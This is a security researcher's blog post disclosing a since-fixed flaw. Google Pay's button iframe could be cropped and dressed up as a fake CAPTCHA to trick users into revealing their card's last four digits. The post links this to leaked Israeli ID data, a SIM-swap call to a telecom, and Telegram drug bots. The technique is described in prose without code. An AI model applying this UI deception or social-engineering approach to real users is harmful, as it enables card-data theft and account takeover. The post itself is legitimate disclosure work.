It starts with something simple: a CAPTCHA box on your screen. You type the number you see, because of course you do. That’s what humans do online. But what if that “CAPTCHA” wasn’t a CAPTCHA at all?
In this post, I’ll walk you through how old data leaks, lazy telecom verification, and a vulnerability in a trusted Google Pay button can be chained together into a SIM swap attack, and why your own instincts make you the perfect accomplice.
The Four Digits Hiding in Google Pay’s Button
My research into Google Pay is not my first look at what can be done with a harmless looking iframe. Back in 2021, I wrote about an attack I called The Human Side Channel, which used the Facebook Like button to determine whether a user liked a specific page. By cropping, scaling, and styling the iframe, I could isolate a single pixel in the icon that changed color depending on the button’s state. With some creative interaction design, I could trick the user into revealing that state without them realizing it.
The same principle applies in this new attack. The Same Origin Policy prevents reading cross-origin content with JavaScript, but it does not stop you from displaying it on the screen and styling it. If you can predict where sensitive information will appear inside an iframe, you can design an interface that persuades the user to expose it for you.
I found that Google Pay’s “Pay” button is a perfect candidate for this. The button is served inside an iframe from a Google domain, and if you are logged in with a saved payment card, it shows the last four digits of that card in plain text. This behavior was consistent across desktop browsers and Android devices, making the attack effective on both. That detail might seem harmless in the context of a legitimate checkout, but it becomes a serious privacy issue when someone frames it in the wrong context.
Turning the Google Pay Button into a “CAPTCHA”
Once you know exactly where those four digits appear inside the iframe, it is simply a matter of presentation. With CSS, the iframe can be cropped so only the numbers are visible and then scaled up to make them prominent. Styling them as part of a CAPTCHA makes them feel legitimate.
To make the illusion convincing, I added two extra numbers, one before and one after the real four digits, so the user saw something like “7 1234 9.” The outer digits were meaningless, but the middle four came directly from Google Pay. A layer of distortion and background noise generated with SVG filters such as and completed the disguise, giving the image the irregular, imperfect look we associate with CAPTCHA challenges.
For the victim, it appeared to be a simple request to solve a CAPTCHA. For the attacker, it was a direct way to obtain the last four digits of the victim’s credit card.
A Real World Example: When Four Digits Decide Your Identity
In Israel, replacing a SIM card is surprisingly low tech. When you call your mobile provider to report a lost or stolen phone, the verification process often comes down to your full name, your national ID number, and the last four digits of your payment method.
On paper, this seems like a reasonable security policy. In practice, the first two checks are practically meaningless. Massive breaches, like the 2006 Agron leak or the 2020 Elector voter management app breach, have already put these identifiers in the public domain, allowing anyone to find Israeli names and ID numbers online.
The following is an AI-generated recording based on a real phone call transcript I had with a major telecom provider in Israel. I called from an unknown number, provided my ID number and the last four digits of the payment method, and the company agreed to send a replacement SIM card without even deactivating the original to any address I requested.
Old Leaks, New Life on Telegram
To understand how old leaks stay dangerous, you have to see how they’ve been woven into daily life. In Tel Aviv, drug ads now come in the form of QR codes on street flyers, directing buyers to Telegram channels where cannabis and other substances can be ordered with a few taps. Behind the scenes, these markets run on bots that handle everything from reporting scams to flagging undercover police or recruiting couriers.
Illegal “Wolt Weed” ads openly promote drug delivery on the streets of Tel Aviv.
Translated image of the Telegram bot
The choice to make these bots publicly accessible, and advertised on street corners, isn’t just about convenience. Open access creates shared infrastructure that protects dealers and buyers from scams, while at the same time complicating law enforcement efforts. But it also normalizes the use of stolen identifiers, turning them into everyday tools in underground markets.
One of the most effective tactics in these channels is requiring buyers to provide a photo of their national ID card alongside a short verification video. This information can then be cross-referenced against the leaked databases. If the ID is fake, the inconsistency shows up quickly. And if the buyer turns out to be an undercover officer, the risk is even higher: their name, ID, and face can be exposed in the same Telegram channels, making anonymity almost impossible to maintain.
This normalization has a broader impact. In Israel, leaked national ID numbers are so widely available that they are effectively public. That reality underpins both drug trades and cybercrime: it enables dealers to verify buyers, and attackers to impersonate victims at telecom providers. Once names and IDs are treated as open information, the only real barrier left is the card digits, and that is where this Google Pay vulnerability comes into play.
Why This Matters Beyond Israel?
Many carriers, banks, and online services worldwide still use the last four digits of a payment card for verification. If those digits are exposed, they can be enough to approve SIM swaps, account changes, or password resets.
Even when not used directly for authentication, they can act as a stable identifier for tracking and fingerprinting users across sites.
Closing Thoughts
We reported this issue to Google, and they acted quickly to remove the last four digits from the Google Pay button, effectively closing off this attack vector. Their swift response addressed the immediate risk, but the problem runs deeper than one iframe.
Telecom providers, banks, and other services that still rely on the last four digits of a card for verification need to reconsider their processes. These digits are not secret, every time you make a payment online, the merchant (through Stripe or other payment processors) can typically see them. Treating them as a trusted proof of identity only invites abuse.
In countries like Israel, where other personal identifiers have already been exposed, those digits may be the only barrier left. Strengthening verification beyond static, easily revealed data is essential to preventing the next variation of this attack.
The post Google Pay, Drug Bots, and SIM Swaps: How Old Leaks and New Vulnerabilities Power Attacks appeared first on Blog.